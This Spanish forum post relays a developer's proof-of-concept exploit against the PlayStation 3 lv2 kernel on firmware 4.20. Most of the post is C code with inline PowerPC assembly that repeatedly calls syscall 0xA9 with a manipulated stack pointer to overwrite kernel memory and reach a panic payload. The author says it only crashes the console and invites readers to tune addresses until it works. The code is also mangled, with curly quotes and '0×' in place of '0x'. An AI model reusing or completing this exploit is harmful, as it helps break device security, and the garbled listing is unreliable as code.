hola, tras la publicacion del posible exploit en el lv2 de naehrwert, kdbest ha encontrado otro, que segun el ha podido ejuecutarlo hasta el firm 4.20:
Another lv2 Exploit has been published, this time from german dev KDSBest. He claims he did not get it to work on firmware 4.21, so he did it on 4.20. If you don’t know what lv2 is, you can read it up on the ps3devwiki.
Since
@naehrwert posted an lv2 exploit I will do so too . The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0×00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;
// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;
if(counter < 0×1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
}
I didn’t managed to make it work on 4.21 so I just did on 4.20
http://www.ps3hax.net/2012/09/another-l ... m-kdsbest/ 
![[beer]](/images/smilies/nuevos2/brindando.gif "brindis")
![[sonrisa]](/images/smilies/nuevos/risa_ani1.gif "sonrisa")
